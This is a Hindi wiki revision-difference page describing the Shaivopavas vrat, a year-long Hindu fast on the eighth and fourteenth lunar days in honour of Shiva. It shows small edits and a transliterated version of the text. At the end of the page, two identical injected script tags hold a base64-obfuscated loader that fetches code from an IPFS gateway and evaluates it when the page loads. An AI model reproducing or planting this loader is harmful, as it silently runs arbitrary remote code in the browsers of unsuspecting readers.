Difference between revisions of "शैवोपवास व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (शैवोपवासव्रत का नाम बदलकर शैवोपवास व्रत कर दिया गया है)
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*एक वर्ष तक प्रत्येक मास के दोनों पक्षों की [[अष्टमी]] एवं [[चतुर्दशी]] पर उपवास किया जाता है।
 
*एक वर्ष तक प्रत्येक मास के दोनों पक्षों की [[अष्टमी]] एवं [[चतुर्दशी]] पर उपवास किया जाता है।
 
*इस व्रत में भगवान [[शिव]] की पूजा की जाती है।<ref>हेमाद्रि (व्रतखण्ड 2, 397, [[भविष्य पुराण]] से उद्धरण)।</ref>
 
*इस व्रत में भगवान [[शिव]] की पूजा की जाती है।<ref>हेमाद्रि (व्रतखण्ड 2, 397, [[भविष्य पुराण]] से उद्धरण)।</ref>
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 10:30, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • ek varsh tak pratyek mas ke donoan pakshoan ki ashtami evan chaturdashi par upavas kiya jata hai.
  • is vrat mean bhagavan shiv ki pooja ki jati hai.[1]


tika tippani aur sandarbh

  1. hemadri (vratakhand 2, 397, bhavishy puran se uddharan).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>